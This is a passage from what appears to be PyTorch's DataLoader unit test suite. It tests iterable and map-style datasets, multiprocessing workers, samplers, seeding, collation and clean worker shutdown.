self._get_data_loader(dataset, batch_sampler=torch.utils.data.BatchSampler(
torch.utils.data.SequentialSampler(dataset), 3, False))
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified batch_sampler"):
self._get_data_loader(dataset, batch_sampler=3)
def test_builtin_collection_conversion(self):
for coll_ty in (list, tuple):
for num_workers in (0, 1):
# map-style dataset
dataset = CountingDataset(20)
# no auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=None, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(range(20)))
# auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=2, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(torch.tensor([i, i + 1]) for i in range(0, 20, 2)))
# iterable-style dataset
dataset = CountingIterableDataset(20)
# no auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=None, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(range(20)))
# auto-batching
# this IterableDataset isn't configured for each worker, so for
# the equality test below to be valid, we cannot have more than 1 worker.
assert num_workers in [0, 1], "invalid test"
fetched = coll_ty(self._get_data_loader(dataset, batch_size=2, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(torch.tensor([i, i + 1]) for i in range(0, 20, 2)))
def test_iterable_style_dataset(self):
# [no auto-batching] single process loading
dataset = CountingIterableDataset(20)
dataloader = self._get_data_loader(dataset, batch_size=None)
fetched = list(dataloader)
self.assertEqual(len(fetched), 20)
for i, d in enumerate(fetched):
# non-batched should not convert ints into tensors
self.assertIsInstance(d, int)
self.assertEqual(d, i)
# DataLoader should match len of the iterable-style dataset (if implemented)
self.assertEqual(len(dataloader), len(dataset))
# [no auto-batching] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=None,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = sorted(dataloader_iter)
for a, b in zip(fetched, expected):
# non-batched should not convert ints into tensors
self.assertIsInstance(a, int)
self.assertEqual(a, b)
# DataLoader should match len of the iterable-style dataset (if implemented)
self.assertEqual(len(dataloader), len(dataset))
# When loading more than len(dataset) data, after accessing len(dataloader),
# we should get a warning. See NOTE [ IterableDataset and __len__ ].
dataset = CountingIterableDataset(20)
dataloader = self._get_data_loader(dataset, num_workers=num_workers,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
it = iter(dataloader)
for _ in range(40):
self.assertNotWarn(lambda: next(it), "Should not warn before accessing len(dataloader)")
self.assertEqual(len(dataloader), len(dataset))
self.assertEqual(len(dataloader), 20)
it = iter(dataloader)
for _ in range(20):
self.assertNotWarn(lambda: next(it), "Should not warn before exceeding length")
for _ in range(3):
with self.assertWarnsRegex(
UserWarning,
r"but [0-9]+ samples have been fetched\. For multiprocessing data-loading, this",
msg="Should always warn after exceeding length"):
next(it)
# [no auto-batching] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
# [auto-batching] single process loading
dataset = CountingIterableDataset(20)
fetched = list(self._get_data_loader(dataset, batch_size=7))
self.assertEqual(len(fetched), 3)
self.assertEqual(fetched[0].tolist(), list(range(7)))
self.assertEqual(fetched[1].tolist(), list(range(7, 14)))
self.assertEqual(fetched[2].tolist(), list(range(14, 20)))
# [auto-batching] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
# worker 0 should return 0 batches
# worker 1 should return 1 batch
# worker 2 should return 3 batches
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=7, prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = list(dataloader_iter)
self.assertEqual(len(fetched), 4)
fetched = set(tuple(t.tolist()) for t in fetched)
self.assertEqual(fetched, {tuple(range(4)), tuple(range(7)), tuple(range(7, 14)), tuple(range(14, 20))})
# [auto-batching] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
# [auto-batching & drop_last] single process loading
dataset = CountingIterableDataset(20)
fetched = list(self._get_data_loader(dataset, batch_size=7, drop_last=True))
self.assertEqual(len(fetched), 2)
self.assertEqual(fetched[0].tolist(), list(range(7)))
self.assertEqual(fetched[1].tolist(), list(range(7, 14)))
# [auto-batching & drop_last] multiprocessing loading
num_workers = 3
sizes_for_all_workers = [0, 4, 20]
expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
for prefetch_factor in [2, 3, 4]:
dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
# worker 0 should return 0 batches
# worker 1 should return 1 batch
# worker 2 should return 3 batches
dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=7, drop_last=True,
worker_init_fn=set_faulthander_if_available,
prefetch_factor=prefetch_factor)
dataloader_iter = iter(dataloader)
fetched = list(dataloader_iter)
self.assertEqual(len(fetched), 2)
fetched = set(tuple(t.tolist()) for t in fetched)
self.assertEqual(fetched, {tuple(range(7)), tuple(range(7, 14))})
# [auto-batching & drop_last] test that workers exit gracefully
workers = dataloader_iter._workers
del dataloader_iter
del dataloader
try:
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive())
self.assertEqual(w.exitcode, 0)
finally:
for w in workers:
w.terminate()
def test_chain_iterable_style_dataset(self):
# chaining (concatenation)
dataset1 = CountingIterableDataset(20)
dataset2 = CountingIterableDataset(15)
expected = list(range(20)) + list(range(15))
for num_workers in [0, 1]:
for chained_dataset in [dataset1 + dataset2, ChainDataset([dataset1, dataset2])]:
fetched = list(self._get_data_loader(chained_dataset, num_workers=num_workers))
self.assertEqual(len(fetched), len(expected))
for e, d in zip(expected, fetched):
self.assertIsInstance(d, torch.Tensor)
self.assertEqual(e, d)
with self.assertRaisesRegex(AssertionError, "ChainDataset only supports IterableDataset"):
list(iter(dataset1 + self.dataset))
with self.assertRaisesRegex(AssertionError, "ChainDataset only supports IterableDataset"):
list(iter(ChainDataset([dataset1, self.dataset])))
def test_multiprocessing_contexts(self):
reference = [
torch.arange(3),
torch.arange(3, 6),
torch.arange(6, 9),
torch.arange(9, 11),
]
counting_ds_n = 11
dl_common_args = dict(num_workers=3, batch_size=3, pin_memory=(not TEST_CUDA))
for ctx in supported_multiprocessing_contexts:
# Windows doesn't support sharing CUDA tensors; ROCm does not yet fully support IPC
if ctx in ['spawn', 'forkserver'] and TEST_CUDA and not IS_WINDOWS:
ds_cls = CUDACountingDataset
else:
ds_cls = CountingDataset
self.assertEqual(
reference, list(self._get_data_loader(ds_cls(counting_ds_n), multiprocessing_context=ctx, **dl_common_args)))
if ctx is not None:
# test ctx object
ctx = mp.get_context(ctx)
self.assertEqual(
reference, list(self._get_data_loader(ds_cls(counting_ds_n), multiprocessing_context=ctx, **dl_common_args)))
def test_worker_seed(self):
num_workers = 6
batch_size = 1
dataset = SynchronizedSeedDataset(num_workers, batch_size, num_workers)
dataloader = self._get_data_loader(dataset, batch_size=batch_size, num_workers=num_workers)
seeds = set()
for batch in dataloader:
seeds.add(batch[0])
self.assertEqual(len(seeds), num_workers)
def test_worker_seed_reproducibility(self):
def get_dataloader():
return DataLoader(dataset, batch_size=batch_size, num_workers=num_workers, generator=torch.Generator().manual_seed(42))
num_workers = 6
batch_size = 1
dataset = SynchronizedSeedDataset(num_workers, batch_size, num_workers)
self.assertEqual(set(int(batch) for batch in get_dataloader()), set(int(batch) for batch in get_dataloader()))
def test_worker_init_fn(self):
dataset = SeedDataset(4)
dataloader = self._get_data_loader(dataset, batch_size=2, num_workers=2,
worker_init_fn=init_fn)
for batch in dataloader:
self.assertEqual(12345, batch[0])
self.assertEqual(12345, batch[1])
def test_get_worker_info(self):
p = ErrorTrackingProcess(target=_test_get_worker_info)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertEqual(p.exitcode, 0)
finally:
p.terminate()
def test_shuffle(self):
self._test_shuffle(self._get_data_loader(self.dataset, shuffle=True))
def test_shuffle_batch_none(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=None, shuffle=True))
def test_shuffle_batch(self):
self._test_shuffle(self._get_data_loader(self.dataset, batch_size=2, shuffle=True))
def test_shuffle_reproducibility(self):
for fn in (
lambda: DataLoader(self.dataset, shuffle=True, num_workers=0, generator=torch.Generator().manual_seed(42)),
lambda: DataLoader(self.dataset, shuffle=True, num_workers=2, generator=torch.Generator().manual_seed(42)),
):
self.assertEqual(list(fn()), list(fn()))
def test_sequential_workers(self):
self._test_sequential(self._get_data_loader(self.dataset, num_workers=4))
def test_sequential_batch_workers(self):
self._test_sequential(self._get_data_loader(self.dataset, batch_size=2, num_workers=4))
def test_sequential_batch_workers_prefetch(self):
self._test_sequential(DataLoader(self.dataset, batch_size=2, num_workers=4, prefetch_factor=3))
def test_shuffle_workers(self):
self._test_shuffle(self._get_data_loader(self.dataset, shuffle=True, num_workers=4))
def test_shuffle_batch_workers(self):
self._test_shuffle(self._get_data_loader(self.dataset, batch_size=2, shuffle=True, num_workers=4))
def test_shuffle_batch_workers_prefetch(self):
self._test_shuffle(DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, prefetch_factor=3))
def test_random_sampler(self):
from collections import Counter
from torch.utils.data import RandomSampler
def sample_stat(sampler, num_samples):
counts = Counter(sampler)
count_repeated = sum(val > 1 for val in counts.values())
return (count_repeated, min(counts.keys()), max(counts.keys()), sum(counts.values()))
# test sample with replacement
n = len(self.dataset) + 1 # ensure at least one sample is drawn more than once
sampler_with_replacement = RandomSampler(self.dataset, replacement=True, num_samples=n)
count_repeated, minval, maxval, count_total = sample_stat(sampler_with_replacement, n)
self.assertTrue(count_repeated > 0)
self.assertTrue(minval >= 0)
self.assertTrue(maxval < len(self.dataset))
self.assertTrue(count_total == n)
# test sample without replacement
sampler_without_replacement = RandomSampler(self.dataset)
count_repeated, minval, maxval, count_total = sample_stat(sampler_without_replacement, len(self.dataset))
self.assertTrue(count_repeated == 0)
self.assertTrue(minval == 0)
self.assertTrue(maxval == len(self.dataset) - 1)
self.assertTrue(count_total == len(self.dataset))
# raise error when replacement=False and num_samples is not None
self.assertRaises(ValueError, lambda: RandomSampler(self.dataset, num_samples=len(self.dataset)))
self.assertRaises(ValueError, lambda: RandomSampler(self.dataset, num_samples=0))
# raise error when replacement is non-boolean
with self.assertRaisesRegex(TypeError, "replacement should be a boolean value, but got replacement=0"):
RandomSampler(self.dataset, replacement=0)
def test_random_sampler_len_with_replacement(self):
from torch.utils.data import RandomSampler
# add 5 extra samples
num_samples = len(self.dataset) + 5
sampler = RandomSampler(self.dataset,
replacement=True,
num_samples=num_samples)
# test len method
self.assertEqual(num_samples, len(sampler))
# test with iteration
count_num_samples = sum(1 for _ in sampler)
self.assertEqual(num_samples, count_num_samples)
# test with dataloader, batch_size = 1
batch_size = 1
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(num_samples, count_num_samples_in_data_loader)
# test with dataloader, batch_size = 6
batch_size = 6
count_num_samples_in_data_loader = len(self._get_data_loader(
self.dataset, batch_size=batch_size, sampler=sampler))
self.assertEqual(int(math.ceil(float(num_samples) / batch_size)),
count_num_samples_in_data_loader)
def test_distributed_sampler_invalid_rank(self):
from torch.utils.data.distributed import DistributedSampler
dataset = torch.IntTensor(range(10))
with self.assertRaisesRegex(ValueError, "Invalid rank"):
sampler = DistributedSampler(dataset, 3, 3)
with self.assertRaisesRegex(ValueError, "Invalid rank"):
sampler = DistributedSampler(dataset, 3, -1)
def test_duplicating_data_with_drop_last(self):
from torch.utils.data.distributed import DistributedSampler
num_processes = 4
num_batches = 9
data_set = torch.IntTensor(range(num_batches))
scanned_data = torch.IntTensor([])
for i in range(num_processes):
s = DistributedSampler(data_set, num_processes, i)
d_loader = self._get_data_loader(data_set, batch_size=int(num_batches / num_processes), drop_last=True, sampler=s)
for data in d_loader:
scanned_data = torch.cat((scanned_data, data), 0)
self.assertEqual(scanned_data.size(), scanned_data.unique().size())
def test_sampler_reproducibility(self):
from torch.utils.data import RandomSampler, WeightedRandomSampler, SubsetRandomSampler
weights = [0.1, 0.9, 0.4, 0.7, 3.0, 0.6]
for fn in (
lambda: RandomSampler(self.dataset, num_samples=5, replacement=True, generator=torch.Generator().manual_seed(42)),
lambda: RandomSampler(self.dataset, replacement=False, generator=torch.Generator().manual_seed(42)),
lambda: WeightedRandomSampler(weights, num_samples=5, replacement=True, generator=torch.Generator().manual_seed(42)),
lambda: WeightedRandomSampler(weights, num_samples=5, replacement=False, generator=torch.Generator().manual_seed(42)),
lambda: SubsetRandomSampler(range(10), generator=torch.Generator().manual_seed(42)),
):
self.assertEqual(list(fn()), list(fn()))
def _test_sampler(self, **kwargs):
indices = range(2, 12) # using a regular iterable
dl = self._get_data_loader(self.dataset, sampler=indices, batch_size=2, **kwargs)
self.assertEqual(len(dl), 5)
for i, (input, _target) in enumerate(dl):
self.assertEqual(len(input), 2)
self.assertEqual(input, self.data[i * 2 + 2:i * 2 + 4])
def test_sampler(self):
self._test_sampler()
self._test_sampler(num_workers=4)
if not NO_MULTIPROCESSING_SPAWN:
self._test_sampler(num_workers=4, multiprocessing_context='spawn')
def _test_batch_sampler(self, **kwargs):
# [(0, 1), (2, 3, 4), (5, 6), (7, 8, 9), ...]
batches = [] # using a regular iterable
for i in range(0, 20, 5):
batches.append(tuple(range(i, i + 2)))
batches.append(tuple(range(i + 2, i + 5)))
dl = self._get_data_loader(self.dataset, batch_sampler=batches, **kwargs)
self.assertEqual(len(dl), 8)
for i, (input, _target) in enumerate(dl):
if i % 2 == 0:
offset = i * 5 // 2
self.assertEqual(len(input), 2)
self.assertEqual(input, self.data[offset:offset + 2])
else:
offset = i * 5 // 2
self.assertEqual(len(input), 3)
self.assertEqual(input, self.data[offset:offset + 3])
def test_batch_sampler(self):
self._test_batch_sampler()
self._test_batch_sampler(num_workers=4)
if not NO_MULTIPROCESSING_SPAWN:
self._test_batch_sampler(num_workers=4, multiprocessing_context='spawn')
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_shuffle_pin_memory(self):
loader = self._get_data_loader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy(self):
import numpy as np
class TestDataset(torch.utils.data.Dataset):
def __getitem__(self, i):
return np.ones((2, 3, 4)) * i
def __len__(self):
return 1000
loader = self._get_data_loader(TestDataset(), batch_size=12)
batch = next(iter(loader))
self.assertIsInstance(batch, torch.DoubleTensor)
self.assertEqual(batch.size(), torch.Size([12, 2, 3, 4]))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_gen_state(self):
from torch.utils.data._utils.worker import _generate_state
# Using NumPy-generated states as the reference to test that `_generate_state`
# produces the same result.
# Test case: ((worker_id, base_seed), expected_state)
test_cases = [
((4, 13434589827475259383), (2884386318, 1088094898, 3523808998, 3860348662)),
((1, 15014285634777110771), (1934848465, 763213760, 2959016433, 179751970)),
((10, 978296274032934101), (1759791917, 3550927336, 1225977135, 1036538043)),
((12, 11868770762134256968), (3974661794, 3331131333, 3630387033, 2885815368)),
((9, 15378787925219019706), (3815056996, 3162224466, 2735102421, 3190253477)),
((5, 9055612723125076328), (3522565701, 3368424109, 959377806, 621878693)),
((15, 14617792358407278405), (3402479508, 1588702753, 1169536393, 3675067356)),
((9, 17363320784006640087), (957989458, 2518334477, 1421725660, 3086155459)),
((12, 480002904169484764), (2732851467, 1762620729, 4055801988, 1277640511)),
((15, 16803975943592702950), (3479415043, 4022359553, 295994005, 3358606349)),
((9, 11704776406047813044), (1968928009, 710113752, 2442656196, 1587420279)),
((10, 16357891985431864516), (1271733898, 4197047399, 3727213786, 2338547348)),
((2, 17423369006318065007), (544294336, 1911284083, 3299147734, 3231058347)),
((2, 2889492011444113593), (3721591783, 2595811276, 2212881745, 977682627)),
((0, 8979703111668486195), (4276723937, 2556068849, 2962827292, 233130238)),
((6, 6269787272229682235), (2548857855, 1216457374, 1012973562, 2999759647))
]
for (worker_id, base_seed), exp in test_cases:
self.assertEqual(exp, _generate_state(base_seed, worker_id))
def test_error(self):
self._test_error(self._get_data_loader(ErrorDataset(100), batch_size=2, shuffle=True))
def test_error_workers(self):
self._test_error(self._get_data_loader(ErrorDataset(41), batch_size=2, shuffle=True, num_workers=4))
@unittest.skipIf(IS_WINDOWS, "FIXME: stuck test")
def test_partial_workers(self):
r"""Check that workers exit even if the iterator is not exhausted."""
if TEST_CUDA:
pin_memory_configs = (True, False)
else:
pin_memory_configs = (False,)
for pin_memory in pin_memory_configs:
loader = iter(self._get_data_loader(self.dataset, batch_size=2, num_workers=4, pin_memory=pin_memory))
workers = loader._workers
if pin_memory:
pin_memory_thread = loader._pin_memory_thread
for i, _ in enumerate(loader):
if i == 10:
break
assert i == 10
del loader
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive(), 'subprocess not terminated')
if pin_memory:
pin_memory_thread.join(JOIN_TIMEOUT)
self.assertFalse(pin_memory_thread.is_alive())
# Takes 2.5min to finish, see https://github.com/pytorch/pytorch/issues/46065
@skipIfRocm
@unittest.skipIf(not HAS_PSUTIL, "psutil not found")
@slowTest
def test_proper_exit(self):
r"""There might be ConnectionResetError or leaked semaphore warnings
(due to dirty process exit), but they are all safe to ignore."""
# TODO: test the case where the pin_memory_thread triggers an
# error/fatal signal. I haven't found out how to properly do that.
for is_iterable_dataset, use_workers, pin_memory, hold_iter_reference in \
itertools.product([True, False], repeat=4):
# `hold_iter_reference` specifies whether we hold a reference to the
# iterator. This is interesting because Python3 error traces hold a
# reference to the frames, which hold references to all the local
# variables including the iterator, and then the iterator dtor may
# not be called before the process ends. It is important to see that the
# processes still exit in both cases.
if pin_memory and (not TEST_CUDA or NO_MULTIPROCESSING_SPAWN or IS_WINDOWS):
# This test runs in a subprocess, which can only initialize CUDA with spawn.
# DataLoader with pin_memory=True initializes CUDA when its iterator is constructed.
# For windows, pin_memory sometimes causes CUDA oom.
continue
# `exit_method` controls the way the loader process ends.
# - `*_kill` means that `*` is killed by OS.
# - `*_error` means that `*` raises an error.
# - `None` means that no error happens.
# In all cases, all processes should end properly.
if use_workers:
exit_methods = [None, 'loader_error', 'loader_kill', 'worker_error', 'worker_kill']
persistent_workers = self.persistent_workers
else:
exit_methods = [None, 'loader_error', 'loader_kill']
persistent_workers = False
for exit_method in exit_methods:
if exit_method == 'worker_kill':
# FIXME: This sometimes hangs. See #16608.
continue
desc = []
desc.append('is_iterable_dataset={}'.format(is_iterable_dataset))
desc.append('use_workers={}'.format(use_workers))
desc.append('pin_memory={}'.format(pin_memory))
desc.append('hold_iter_reference={}'.format(hold_iter_reference))
desc.append('exit_method={}'.format(exit_method))
desc = 'test_proper_exit with ' + ', '.join(desc)
# Event that the loader process uses to signal the testing process
# that various things are set up, including that the DataLoader
# workers have been started.
loader_setup_event = mp.Event()
# Event that this process has finished setting up, and the
# loader process can now proceed to trigger error events or
# finish normally.
tester_setup_event = mp.Event()
loader_p = ErrorTrackingProcess(target=_test_proper_exit,
args=(is_iterable_dataset, use_workers, pin_memory,
exit_method, hold_iter_reference,
loader_setup_event, tester_setup_event,
persistent_workers),
disable_stderr=False)
loader_p.start()
loader_psutil_p = psutil.Process(loader_p.pid)
# Wait for loader process to set everything up, e.g., starting
# workers.
loader_setup_event.wait(timeout=JOIN_TIMEOUT)
if not loader_setup_event.is_set():
fail_msg = desc + ': loader process failed to setup within given time'
if loader_p.exception is not None:
fail_msg += ', and had exception {}'.format(loader_p.exception)
elif not loader_p.is_alive():
fail_msg += ', and exited with code {} but had no exception'.format(loader_p.exitcode)
else:
fail_msg += ', and is still alive.'
if loader_p.is_alive():
# this may kill the process, needs to run after the above lines
loader_p.print_traces_of_all_threads()
self.fail(fail_msg)
# We are certain that the workers have started now.
worker_psutil_ps = loader_psutil_p.children()
def fail(reason):
report_psutil_attrs = ['pid', 'name', 'cpu_times', 'io_counters',
'memory_full_info', 'num_ctx_switches',
'open_files', 'threads', 'status',
'nice', 'ionice']
if reason is None:
err_msg = desc
else:
err_msg = '{}: {}'.format(desc, reason)
err_msg += '\nLoader info:\n\t'
if loader_psutil_p.is_running():
err_msg += str(loader_psutil_p.as_dict(attrs=report_psutil_attrs))
# this may kill the process, needs to run after the above line
loader_p.print_traces_of_all_threads()
else:
err_msg += 'exited with code {}'.format(loader_p.exitcode)
if use_workers:
err_msg += '\nWorker(s) info:'
for idx, worker_psutil_p in enumerate(worker_psutil_ps):
err_msg += '\n\tWorker {}:\n\t\t'.format(idx)
if worker_psutil_p.is_running():
err_msg += str(worker_psutil_p.as_dict(attrs=report_psutil_attrs))
# this may kill the process, needs to run after the above line
print_traces_of_all_threads(worker_psutil_p.pid)
else:
err_msg += 'exited with unknown code'
self.fail(err_msg)
tester_setup_event.set()
try:
loader_p.join(JOIN_TIMEOUT + MP_STATUS_CHECK_INTERVAL)
if loader_p.is_alive():
fail_reason = 'loader process did not terminate'
if loader_p.exception is not None:
fail(fail_reason + ', and had exception {}'.format(loader_p.exception))
else:
fail(fail_reason + ', and had no exception')
_, alive = psutil.wait_procs(worker_psutil_ps, timeout=(MP_STATUS_CHECK_INTERVAL + JOIN_TIMEOUT))
if len(alive) > 0:
fail('worker process (pid(s) {}) did not terminate'.format(
', '.join(str(p.pid) for p in alive)))
if exit_method is None:
if loader_p.exitcode != 0:
fail('loader process had nonzero exitcode {}'.format(loader_p.exitcode))
else:
if loader_p.exitcode == 0:
fail('loader process had zero exitcode')
if exit_method == 'loader_error':
if not isinstance(loader_p.exception, RuntimeError) or \
'Loader error' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif exit_method == 'worker_kill':
if isinstance(loader_p.exception, RuntimeError):
if 'DataLoader worker (pid' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif isinstance(loader_p.exception, ConnectionRefusedError):
# Sometimes, when the worker is being killed and is freeing its
# resources, the unpickling in the loader process will hit a
# `ConnectionRefusedError` because it cannot open a socket to receive
# the resource. In such cases, the worker may not have fully exited,
# and the loader can't know this via `is_alive` check or `SIGCHLD`
# handler. So we permit this as an allowed error as well.
# After all, we are happy as long as it terminates.
pass
else:
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif exit_method == 'worker_error':
if not isinstance(loader_p.exception, RuntimeError) or \
'Worker error' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
finally:
loader_p.terminate()
def test_len(self):
def check_len(dl, expected):
self.assertEqual(len(dl), expected)
n = 0
for _ in dl:
n += 1
self.assertEqual(n, expected)
check_len(self.dataset, 100)
check_len(self._get_data_loader(self.dataset, batch_size=2), 50)
check_len(self._get_data_loader(self.dataset, batch_size=3), 34)
def test_iterabledataset_len(self):
class IterableDataset(torch.utils.data.IterableDataset):
def __len__(self):
return 10
def __iter__(self):
return iter(range(10))
iterable_loader = DataLoader(IterableDataset(), batch_size=1)
self.assertEqual(len(iterable_loader), 10)
iterable_loader = DataLoader(IterableDataset(), batch_size=1, drop_last=True)
self.assertEqual(len(iterable_loader), 10)
iterable_loader = DataLoader(IterableDataset(), batch_size=2)
self.assertEqual(len(iterable_loader), 5)
iterable_loader = DataLoader(IterableDataset(), batch_size=2, drop_last=True)
self.assertEqual(len(iterable_loader), 5)
iterable_loader = DataLoader(IterableDataset(), batch_size=3)
self.assertEqual(len(iterable_loader), 4)
iterable_loader = DataLoader(IterableDataset(), batch_size=3, drop_last=True)
self.assertEqual(len(iterable_loader), 3)
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_scalars(self):
import numpy as np
class ScalarDataset(torch.utils.data.Dataset):
def __init__(self, dtype):
self.dtype = dtype
def __getitem__(self, i):
return self.dtype()
def __len__(self):
return 4
dtypes = {
np.float64: torch.DoubleTensor,
np.float32: torch.FloatTensor,
np.float16: torch.HalfTensor,
np.int64: torch.LongTensor,
np.int32: torch.IntTensor,
np.int16: torch.ShortTensor,
np.int8: torch.CharTensor,
np.uint8: torch.ByteTensor,
}
for dt, tt in dtypes.items():
dset = ScalarDataset(dt)
loader = self._get_data_loader(dset, batch_size=2)
batch = next(iter(loader))
self.assertIsInstance(batch, tt)
def test_default_collate_dtype(self):
arr = [1, 2, -1]
collated = _utils.collate.default_collate(arr)
self.assertEqual(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.int64)
arr = [1.1, 2.3, -0.9]
collated = _utils.collate.default_collate(arr)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.float64)
arr = [True, False]
collated = _utils.collate.default_collate(arr)
self.assertEqual(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.bool)
# Should be a no-op
arr = ['a', 'b', 'c']
self.assertEqual(arr, _utils.collate.default_collate(arr))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_bad_numpy_types(self):
import numpy as np
# Should be a no-op
arr = np.array(['a', 'b', 'c'])
self.assertEqual(arr, _utils.collate.default_collate(arr))
arr = np.array([[['a', 'b', 'c']]])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
arr = np.array([object(), object(), object()])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
arr = np.array([[[object(), object(), object()]]])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_numpy_memmap(self):
import numpy as np
with tempfile.TemporaryFile() as f:
arr = np.array([[0, 1], [2, 3], [4, 5], [6, 7]])
arr_memmap = np.memmap(f, dtype=arr.dtype, mode='w+', shape=arr.shape)
arr_memmap[:] = arr[:]
arr_new = np.memmap(f, dtype=arr.dtype, mode='r', shape=arr.shape)
tensor = _utils.collate.default_collate(list(arr_new))
self.assertTrue((tensor == tensor.new_tensor([[0, 1], [2, 3], [4, 5], [6, 7]])).all().item())
def test_default_collate_bad_sequence_type(self):
batch = [['X'], ['X', 'X']]
self.assertRaises(RuntimeError, lambda: _utils.collate.default_collate(batch))
self.assertRaises(RuntimeError, lambda: _utils.collate.default_collate(batch[::-1]))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_shared_tensor(self):
import numpy as np
t_in = torch.zeros(1)
n_in = np.zeros(1)
self.assertEqual(t_in.is_shared(), False)
self.assertEqual(_utils.collate.default_collate([t_in]).is_shared(), False)
self.assertEqual(_utils.collate.default_collate([n_in]).is_shared(), False)
# FIXME: fix the following hack that makes `default_collate` believe
# that it is in a worker process (since it tests
# `get_worker_info() != None`), even though it is not.
old = _utils.worker._worker_info
try:
_utils.worker._worker_info = 'x'
self.assertEqual(_utils.collate.default_collate([t_in]).is_shared(), True)
self.assertEqual(_utils.collate.default_collate([n_in]).is_shared(), True)
finally:
_utils.worker._worker_info = old
def test_excessive_thread_creation_warning(self):
with self.assertWarnsRegex(
UserWarning,
r"excessive worker creation might get DataLoader running slow or even freeze"):
dataloader = DataLoader(self.dataset, batch_size=2, num_workers=1000)
class StringDataset(Dataset):
def __init__(self):
self.s = '12345'
def __len__(self):
return len(self.s)
def __getitem__(self, ndx):
return (self.s[ndx], ndx)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestStringDataLoader(TestCase):
def setUp(self):
super(TestStringDataLoader, self).setUp()
self.dataset = StringDataset()
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_shuffle_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for (s, n) in loader:
self.assertIsInstance(s[0], str)
self.assertTrue(n.is_pinned())
class DictDataset(Dataset):
def __len__(self):
return 4
def __getitem__(self, ndx):
return {
'a_tensor': torch.empty(4, 2).fill_(ndx),
'another_dict': {
'a_number': ndx,
},
}
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDictDataLoader(TestCase):
def setUp(self):
super(TestDictDataLoader, self).setUp()
self.dataset = DictDataset()
def test_sequential_batch(self):
for persistent_workers in (False, True):
if persistent_workers:
loader = DataLoader(self.dataset, batch_size=2, shuffle=False,
persistent_workers=persistent_workers, num_workers=1)
else:
loader = DataLoader(self.dataset, batch_size=2, shuffle=False,
persistent_workers=persistent_workers)
batch_size = loader.batch_size
for i, sample in enumerate(loader):
idx = i * batch_size
self.assertEqual(set(sample.keys()), {'a_tensor', 'another_dict'})
